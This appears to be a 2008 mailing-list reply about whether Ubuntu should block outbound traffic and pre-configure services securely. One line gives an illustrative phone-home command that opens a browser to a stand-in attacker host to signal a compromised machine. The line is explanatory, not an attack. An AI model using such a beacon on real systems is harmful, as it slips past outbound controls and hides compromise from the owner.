On Sat, Aug 2, 2008 at 6:23 AM, Mackenzie Morgan <[EMAIL PROTECTED]> wrote:
> Because as he said, if you pre-configure everything to
> super-duper-easy-peasy, you've also pre-configured it to
> super-duper-easy-peasy-to-crack. I'm personally disappointed by
> firewalls that allow outbound by default, because something could phone
> home if I put my trust in an application I shouldn't, but they're
> easy-peasy for users, so that's what people do. I can manually go
> through and fix it myself, but if some application is running about
> opening who knows how many ports and setting god-knows-what services to
> auto-start and mucking about with insecure options in config files...how
> many months is it going to take me to track all of that down? No way.

Commercial Windows firewalls pretty much all block outbound traffic by default, popping up a dialog box offering to allow that particular application to access the internet. I understand that it is fairly easy for an attacker to phone home though. For example, just run firefox http://ATTACKER/this-machine-is-cracked.

However, if it is good practice to prevent e.g. httpd making outgoing connections, this should be done by default. It is fairly easy to do this with e.g. systrace.

The argument that it is hard to set up these systems to be secure seems to be an argument that they should be secured once, by Ubuntu, with a great deal of scrutiny on whether the configuration really is secure. Even if we assume that everyone will hire a UNIX guru, we can't assume that all the "gurus" really are gurus or that they won't forget one tiny exploit.

Ubuntu desktop already has one server function. I can right-click a file, go to share and share the folder using samba. If you know of any security flaws with this GUI, please report a bug.

-- 
John C. McCabe-Dansted
PhD Student
University of Western Australia